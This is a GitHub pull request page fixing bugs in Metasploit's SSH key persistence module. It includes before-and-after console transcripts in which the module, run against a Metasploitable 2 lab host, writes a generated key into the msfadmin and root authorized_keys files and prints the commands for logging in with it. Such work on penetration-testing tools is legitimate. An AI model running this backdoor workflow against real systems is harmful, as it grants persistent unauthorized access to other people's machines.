Skip to content

ssh_key_persistence: Bug fixes#21510

Open
g0tmi1k wants to merge 19 commits into
rapid7:masterfrom
g0tmi1k:ssh_key_persistence
Open

ssh_key_persistence: Bug fixes#21510
g0tmi1k wants to merge 19 commits into
rapid7:masterfrom
g0tmi1k:ssh_key_persistence

Conversation

@g0tmi1k
Copy link
Copy Markdown
Contributor

@g0tmi1k g0tmi1k commented May 27, 2026

This PR helps to improve by doing:

  • Various bug fixes
  • Fix typos
  • Tweak output
  • Consistency with loot names

Target is Metasploitable 2.

        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      0         2      2      3      0
After : *        default  1      1         2      2      4      1

Note, this module uses the exploit/multi/ssh/sshexec module to get a session. However, its not using the PR I recently opened up improving it (Thats out of scope for this PR).

Before

  • All testing was done using master branch
  • Error as soon as you start to use the module
  • Error running the module
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use exploit/multi/persistence/ssh_key;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:34079 -> 10.0.0.10:22) at 2026-05-27 00:02:41 +0100
[*] Session 1 created in the background.
[*] Using configured payload payload/generic/custom

Module options (exploit/multi/persistence/ssh_key):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   CREATESSHFOLDER  false            yes       If no .ssh folder is found, create it for the target user
   PUBKEY                            no        Path to Public Key File to use. (Default: Create a new one)
   SESSION                           yes       The session to run this module on
   SSHD_CONFIG                       no        sshd_config file
   USERNAME                          no        User to add SSH key to (Default: all users on box)

[-] Invalid payload defined: payload/generic/custom

msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) > run SESSION=1
[-] Exploit failed: You specified an invalid payload: payload/generic/custom
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) > run SESSION=1 PAYLOAD=generic/custom
[*] Exploit running as background job 0.
msf exploit(multi/persistence/ssh_key) >
[!] SESSION may not be compatible with this module:
[!]  * Unknown session arch
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking SSH Permissions
[+] Pubkey set to yes
[+] The target appears to be vulnerable. Likely vulnerable
[!] Payload handler is disabled, the persistence will be installed only.
[*] Determining authorized_keys file
[*] Authorized Keys File: .ssh/authorized_keys
[*] Found 32 potential user folders
[!] No .ssh folder found for //.ssh, skipping...
[!] No //.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /bin/.ssh, skipping...
[!] No /bin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /dev/.ssh, skipping...
[!] No /dev/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/ftp/.ssh, skipping...
[!] No /home/ftp/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/klog/.ssh, skipping...
[!] No /home/klog/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/service/.ssh, skipping...
[!] No /home/service/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/syslog/.ssh, skipping...
[!] No /home/syslog/.ssh/authorized_keys file found, skipping...
[!] No /home/user/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /nonexistent/.ssh, skipping...
[!] No /nonexistent/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/games/.ssh, skipping...
[!] No /usr/games/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/sbin/.ssh, skipping...
[!] No /usr/sbin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/share/tomcat5.5/.ssh, skipping...
[!] No /usr/share/tomcat5.5/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/backups/.ssh, skipping...
[!] No /var/backups/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/bind/.ssh, skipping...
[!] No /var/cache/bind/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/man/.ssh, skipping...
[!] No /var/cache/man/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/gnats/.ssh, skipping...
[!] No /var/lib/gnats/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/libuuid/.ssh, skipping...
[!] No /var/lib/libuuid/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/mysql/.ssh, skipping...
[!] No /var/lib/mysql/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/nfs/.ssh, skipping...
[!] No /var/lib/nfs/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/postgresql/.ssh, skipping...
[!] No /var/lib/postgresql/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/list/.ssh, skipping...
[!] No /var/list/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/mail/.ssh, skipping...
[!] No /var/mail/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/ircd/.ssh, skipping...
[!] No /var/run/ircd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/proftpd/.ssh, skipping...
[!] No /var/run/proftpd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/sshd/.ssh, skipping...
[!] No /var/run/sshd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/lpd/.ssh, skipping...
[!] No /var/spool/lpd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/news/.ssh, skipping...
[!] No /var/spool/news/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/postfix/.ssh, skipping...
[!] No /var/spool/postfix/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/uucp/.ssh, skipping...
[!] No /var/spool/uucp/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/www/.ssh, skipping...
[!] No /var/www/.ssh/authorized_keys file found, skipping...
[*] Found 32 confirmed user folders
[+] Storing new private key as /home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt. Change the permissions to 600 before using it
[*] Adding key to /home/msfadmin/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 725 bytes in 1 chunks of 2750 bytes (octal-encoded), using printf
[+] Persistence installed! Call a shell using 'ssh -i /home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt <username>@10.0.0.10'
[+] use auxiliary/scanner/ssh/ssh_login
[+]   run KEY_PATH=/home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt RHOSTS=10.0.0.10 USERNAME=<username>
[*] Adding key to /root/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 725 bytes in 1 chunks of 2750 bytes (octal-encoded), using printf
[+] Persistence installed! Call a shell using 'ssh -i /home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt <username>@10.0.0.10'
[+] use auxiliary/scanner/ssh/ssh_login
[+]   run KEY_PATH=/home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt RHOSTS=10.0.0.10 USERNAME=<username>
[-] Exploit failed: NoMethodError undefined method `sys' for #<Msf::Sessions::SshCommandShellBind:0x00007faa37333770>

msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         2      2      3      0

msf exploit(multi/persistence/ssh_key) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf exploit(multi/persistence/ssh_key) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                               References
---------                ----       -------  --------  ----                               ----------
2026-05-27 06:11:20 UTC  10.0.0.10  None     {}        SSH User Code Execution            CVE-1999-0502,ATT&CK-T1021.004
2026-05-27 06:12:16 UTC  10.0.0.10  None     {}        exploit/multi/persistence/ssh_key  ATT&CK-T1098.004,URL-https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_keymanagement,U
                                                                                          RL-https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=gui&pivots=
                                                                                          windows-10,URL-https://stackoverflow.com/a/50502015

msf exploit(multi/persistence/ssh_key) > creds
Credentials
===========

id   host  origin     service  public    private                                          realm  private_type  JtR Format  cracked_password
--   ----  ------     -------  ------    -------                                          -----  ------------  ----------  ----------------
591        10.0.0.10           msfadmin  0c:3f:1b:b2:97:b3:f1:db:16:bf:b8:b3:32:4c:b6:7a         SSH key
592        10.0.0.10           root      0c:3f:1b:b2:97:b3:f1:db:16:bf:b8:b3:32:4c:b6:7a         SSH key

msf exploit(multi/persistence/ssh_key) > lo
[-] Unknown command: lo. Did you mean log? Run the help command for more details.
msf exploit(multi/persistence/ssh_key) > loot

Loot
====

host       service  type             name             content     info                      path
----       -------  ----             ----             -------     ----                      ----
10.0.0.10           id_rsa           ssh_id_rsa       text/plain  OpenSSH Private Key File  /home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt
10.0.0.10           authorized_keys  authorized_keys  text/plain  SSH Authorized Keys File  /home/kali/.msf4/loot/20260527071259_default_10.0.0.10_authorized_keys_508496.txt
10.0.0.10           authorized_keys  authorized_keys  text/plain  SSH Authorized Keys File  /home/kali/.msf4/loot/20260527071306_default_10.0.0.10_authorized_keys_173818.txt

msf exploit(multi/persistence/ssh_key) >

After

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use exploit/multi/persistence/ssh_key;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:39701 -> 10.0.0.10:22) at 2026-05-27 07:08:45 +0100
[*] Session 1 created in the background.
[*] Using configured payload generic/custom

Module options (exploit/multi/persistence/ssh_key):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   CREATESSHFOLDER  false            yes       If no .ssh folder is found, create it for the target user
   PUBKEY                            no        Path to Public Key File to use. (Default: Create a new one)
   SESSION                           yes       The session to run this module on
   SSHD_CONFIG                       no        sshd_config file
   USERNAME                          no        User to add SSH key to (Default: all users on box)


Payload options (generic/custom):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PAYLOADFILE                   no        The file to read the payload from
   PAYLOADSTR                    no        The string to use as a payload

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      0

msf exploit(multi/persistence/ssh_key) > run SESSION=1
[!] SESSION may not be compatible with this module:
[!]  * Unknown session arch
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking SSH permissions
[+] Pubkey set to yes
[+] The target appears to be vulnerable. Likely vulnerable
[!] Payload handler is disabled, the persistence will be installed only.
[*] Determining authorized_keys file
[*] Authorized keys file (relative): .ssh/authorized_keys
[*] Found 32 potential user folders
[!] No .ssh folder found for /.ssh, skipping...
[!] No /.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /bin/.ssh, skipping...
[!] No /bin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /dev/.ssh, skipping...
[!] No /dev/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/ftp/.ssh, skipping...
[!] No /home/ftp/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/klog/.ssh, skipping...
[!] No /home/klog/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/service/.ssh, skipping...
[!] No /home/service/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/syslog/.ssh, skipping...
[!] No /home/syslog/.ssh/authorized_keys file found, skipping...
[!] No /home/user/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /nonexistent/.ssh, skipping...
[!] No /nonexistent/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/games/.ssh, skipping...
[!] No /usr/games/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/sbin/.ssh, skipping...
[!] No /usr/sbin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/share/tomcat5.5/.ssh, skipping...
[!] No /usr/share/tomcat5.5/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/backups/.ssh, skipping...
[!] No /var/backups/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/bind/.ssh, skipping...
[!] No /var/cache/bind/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/man/.ssh, skipping...
[!] No /var/cache/man/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/gnats/.ssh, skipping...
[!] No /var/lib/gnats/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/libuuid/.ssh, skipping...
[!] No /var/lib/libuuid/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/mysql/.ssh, skipping...
[!] No /var/lib/mysql/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/nfs/.ssh, skipping...
[!] No /var/lib/nfs/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/postgresql/.ssh, skipping...
[!] No /var/lib/postgresql/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/list/.ssh, skipping...
[!] No /var/list/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/mail/.ssh, skipping...
[!] No /var/mail/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/ircd/.ssh, skipping...
[!] No /var/run/ircd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/proftpd/.ssh, skipping...
[!] No /var/run/proftpd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/sshd/.ssh, skipping...
[!] No /var/run/sshd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/lpd/.ssh, skipping...
[!] No /var/spool/lpd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/news/.ssh, skipping...
[!] No /var/spool/news/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/postfix/.ssh, skipping...
[!] No /var/spool/postfix/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/uucp/.ssh, skipping...
[!] No /var/spool/uucp/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/www/.ssh, skipping...
[!] No /var/www/.ssh/authorized_keys file found, skipping...
[*] Found 32 confirmed user folders
[*] Authorized Keys File: /home/msfadmin/.ssh/authorized_keys
[*] User: msfadmin
[*] Clean-up: Restore /home/msfadmin/.ssh/authorized_keys from local loot: /home/kali/.msf4/loot/20260527070945_default_10.0.0.10_ssh.authkey.msfa_210696.txt
[*] Adding key to: /home/msfadmin/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 725 bytes in 1 chunks of 2773 bytes (octal-encoded), using printf
[+] Persistence installed!
[*] Storing new private key: /home/kali/.msf4/loot/20260527070947_default_10.0.0.10_ssh.privatekey.r_360128.txt. Change the permissions to 600 before using it.
[*]   To get a ssh shell  : $ ssh -i /home/kali/.msf4/loot/20260527070947_default_10.0.0.10_ssh.privatekey.r_360128.txt msfadmin@10.0.0.10
[*]   To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=/home/kali/.msf4/loot/20260527070947_default_10.0.0.10_ssh.privatekey.r_360128.txt USERNAME=msfadmin RHOSTS=10.0.0.10'
[*] Authorized Keys File: /root/.ssh/authorized_keys
[*] User: root
[*] Clean-up: Restore /root/.ssh/authorized_keys from local loot: /home/kali/.msf4/loot/20260527070952_default_10.0.0.10_ssh.authkey.root_031955.txt
[*] Adding key to: /root/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 725 bytes in 1 chunks of 2773 bytes (octal-encoded), using printf
[+] Persistence installed!
[*] Storing new private key: /home/kali/.msf4/loot/20260527070954_default_10.0.0.10_ssh.privatekey.r_681133.txt. Change the permissions to 600 before using it.
[*]   To get a ssh shell  : $ ssh -i /home/kali/.msf4/loot/20260527070954_default_10.0.0.10_ssh.privatekey.r_681133.txt root@10.0.0.10
[*]   To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=/home/kali/.msf4/loot/20260527070954_default_10.0.0.10_ssh.privatekey.r_681133.txt USERNAME=root RHOSTS=10.0.0.10'

[*] Clean-up reference file (not directly executable): /home/kali/.msf4/logs/persistence/10.0.0.10_20260527.1004/10.0.0.10_20260527.1004.rc
msf exploit(multi/persistence/ssh_key) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         2      2      4      1

msf exploit(multi/persistence/ssh_key) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf exploit(multi/persistence/ssh_key) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf exploit(multi/persistence/ssh_key) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                               References
---------                ----       -------       --------  ----                               ----------
2026-05-27 06:08:45 UTC  10.0.0.10  ssh (22/tcp)  {}        SSH User Code Execution            CVE-1999-0502,ATT&CK-T1021.004
2026-05-27 06:09:02 UTC  10.0.0.10  None          {}        exploit/multi/persistence/ssh_key  ATT&CK-T1098.004,URL-https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_keymanagem
                                                                                               ent,URL-https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=g
                                                                                               ui&pivots=windows-10,URL-https://stackoverflow.com/a/50502015

msf exploit(multi/persistence/ssh_key) > creds
Credentials
===========

id   host       origin     service       public    private                                          realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------                                          -----  ------------  ----------  ----------------
589  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  94:21:26:63:38:ae:3c:6b:2e:37:3f:a4:dd:48:8f:e3         SSH key
590  10.0.0.10  10.0.0.10  22/tcp (ssh)  root      94:21:26:63:38:ae:3c:6b:2e:37:3f:a4:dd:48:8f:e3         SSH key

msf exploit(multi/persistence/ssh_key) > loot

Loot
====

host       service  type                  name             content     info                                                path
----       -------  ----                  ----             -------     ----                                                ----
10.0.0.10           ssh.authkey.msfadmin  authorized_keys  text/plain  SSH Authorized Keys File (msfadmin)                 /home/kali/.msf4/loot/20260527070945_default_10.0.0.10_ssh.authkey.msfa_210696.txt
10.0.0.10           ssh.privatekey.rsa    msfadmin_id_rsa  text/plain  SHA256:4ShUnk6Yzj7yDLKEaRYn8LzbqLhzr2H6l2i/CLo70qQ  /home/kali/.msf4/loot/20260527070947_default_10.0.0.10_ssh.privatekey.r_360128.txt
10.0.0.10           ssh.authkey.root      authorized_keys  text/plain  SSH Authorized Keys File (root)                     /home/kali/.msf4/loot/20260527070952_default_10.0.0.10_ssh.authkey.root_031955.txt
10.0.0.10           ssh.privatekey.rsa    root_id_rsa      text/plain  SHA256:4ShUnk6Yzj7yDLKEaRYn8LzbqLhzr2H6l2i/CLo70qQ  /home/kali/.msf4/loot/20260527070954_default_10.0.0.10_ssh.privatekey.r_681133.txt

msf exploit(multi/persistence/ssh_key) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type                      Data
 ----                     ----       -------  ----  --------  ----                      ----
 2026-05-27 06:10:04 UTC  10.0.0.10                           host.persistence.cleanup  {:local_id=>1, :stype=>"shell", :desc=>"SSH kali @ ", :platform=>"linux", :via_payload=>"payload/generic/ssh/interact"
                                                                                        , :via_exploit=>"exploit/multi/ssh/sshexec", :created_at=>2026-05-27 06:10:04.909493372 UTC, :commands=>"# Restore /ho
                                                                                        me/msfadmin/.ssh/authorized_keys - local backup: /home/kali/.msf4/loot/20260527070945_default_10.0.0.10_ssh.authkey.ms
                                                                                        fa_210696.txt\n# Restore /root/.ssh/authorized_keys - local backup: /home/kali/.msf4/loot/20260527070952_default_10.0.
                                                                                        0.10_ssh.authkey.root_031955.txt\n"}

msf exploit(multi/persistence/ssh_key) >

h00die
h00die reviewed May 27, 2026
View reviewed changes
Comment thread modules/exploits/multi/persistence/ssh_key.rb
Comment thread modules/exploits/multi/persistence/ssh_key.rb Outdated
@g0tmi1k g0tmi1k force-pushed the ssh_key_persistence branch from 2e1b5ff to a42376a Compare May 29, 2026 12:30
g0tmi1k added 16 commits May 29, 2026 13:32
@g0tmi1k
Improve non-meterpreter support
a329d50 
Also fixes a crash by with save_cleanup_rc (Metasploitable 2)
@g0tmi1k
ssh_key: Improve Windows non-meterpreter support
e403f44
@g0tmi1k
ssh_key: Improve Windows, quote icacls path
36343db
@g0tmi1k
ssh_key: Drop dead code, windows_service_owner()
db17a1e
@g0tmi1k
ssh_key: Improve success output
8421d0d
@g0tmi1k
ssh_key: Track SSH user
4818a48
@g0tmi1k
ssh_key: Disable passive to stop being in the background
e2def62
@g0tmi1k
ssh_key: // -> /
2dc2d96
@g0tmi1k
persistence: Fix typo
a4a6e8a
@g0tmi1k
persistence: Make rubocop happy
beaab94
@g0tmi1k
ssh_key: Improve Linux root support
100321f
@g0tmi1k
ssh_key: Formatting
529dc89
@g0tmi1k
ssh_key: Update SSH loot key name
b1dd3fa 
Consistency with: ./modules/auxiliary/scanner/ssh/ssh_key_login.rb, ./modules/exploits/multi/persistence/ssh_key.rb & ./modules/post/multi/gather/ssh_creds.rb
@g0tmi1k
ssh_key: Fix not showing fingerprint
39bb096
@g0tmi1k
ssh_key: Switch origin_type to :service
50fd5ba
@g0tmi1k
ssh_key: Fix KeyError missing module_fullname
93586d0
@g0tmi1k g0tmi1k force-pushed the ssh_key_persistence branch from a42376a to 93586d0 Compare May 29, 2026 12:32
@g0tmi1k g0tmi1k requested a review from h00die May 29, 2026 12:42
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@h00die h00die Awaiting requested review from h00die

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

None yet

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@g0tmi1k @h00die @smcintyre-r7